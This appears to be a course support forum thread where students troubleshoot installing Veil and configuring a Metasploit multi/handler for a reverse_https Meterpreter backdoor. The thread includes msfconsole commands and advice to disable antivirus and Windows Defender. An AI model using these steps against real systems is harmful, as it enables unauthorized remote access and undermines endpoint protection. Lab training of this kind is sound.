- This topic has 11 replies, 3 voices, and was last updated 4 years, 2 months ago by Diego Pérez.
- AuthorPosts
- August 10, 2020 at 2:32 am #43922justin741008Participant
When I go to install veil it does this error
August 10, 2020 at 3:33 am #43927Diego PérezModeratorHi!
Can you try this solution:apt update
apt install -y aptitude
aptitude install -y veilYou have to run this commands in a fresh custom kali.
Let me know how it goes!
DiegoAugust 10, 2020 at 10:42 pm #43974justin741008ParticipantAugust 11, 2020 at 3:51 am #43986Diego PérezModeratorHi!
You’ll need to disable your AV or defender in host and the try it again.Let me know how it goes!
DiegoAugust 11, 2020 at 4:18 am #43988justin741008ParticipantYeah I did that it worked. Thanks
August 12, 2020 at 3:28 am #44030Diego PérezModeratorHi!
Cool you got it!
DiegoSeptember 4, 2020 at 2:07 am #45096PatientParticipantHi Diego,
Had an issue trying to listen on a port after generating my rev_https_8080 backdoor on VEIL.
On my MSF Console, when I use exploit/multi/handler then show options , It’ doesn’t show all the options (LHOST & LPORT etc…)
This is what I have as a result:msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–Exploit target:
Id Name
— —-
0 Wildcard TargetThanks for any feedback on how to solve this… I’m still searching for a workaround.
BR//
PatientSeptember 4, 2020 at 2:31 am #45099Diego PérezModeratorHi!
You have to set the payload first.When you are inside multi handle run:
set PAYLOAD your/payload/here
the show options and they will be displayed for you.
Let me know how it goes!
DiegoSeptember 4, 2020 at 9:10 am #45105PatientParticipantHi Diego,
Thanks for your replies/ I set the Payload and it seems Okay.———————————————————————-
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
set PAYLOAD windows/meterpreter/reverse_https set PAYLOAD windows/meterpreter/reverse_https_proxy
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):
Name Current Setting Required Description—- ————— ——– ———–
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP PathExploit target:
Id Name
— —-
0 Wildcard TargetBest regards,
Patient KSeptember 4, 2020 at 9:34 am #45107PatientParticipantHello Diego,
After trying to run the backdoor, Lol… The windows 10 (Windows defender) machine saw it as follows:
The file contained a virus and was deleted: Finally I simply disable the firewall to move forward. I’ll come back after the lectures to play around.Trojan:Win32/Leivon!rfn
Alert level: Severe
Category: Trojan
Details: This program is dangerous and xecutes commands from an attacker:Best regards,
PatientSeptember 4, 2020 at 9:49 am #45108PatientParticipantHey it’s me again…
can’t see the ***STARTING THE PAYLOAD HANDLER*** message after I run my exploit.msf5 exploit(multi/handler) > exploit
[*] Started HTTPS reverse handler on https://10.0.2.15:8080Best regards,
PatientSeptember 5, 2020 at 1:14 am #45158Diego PérezModeratorHi!
That message is not displayed anymore in the latest metasploit versions, so don’t worry about it.Greetings!
Diego - AuthorPosts
- You must be logged in to reply to this topic.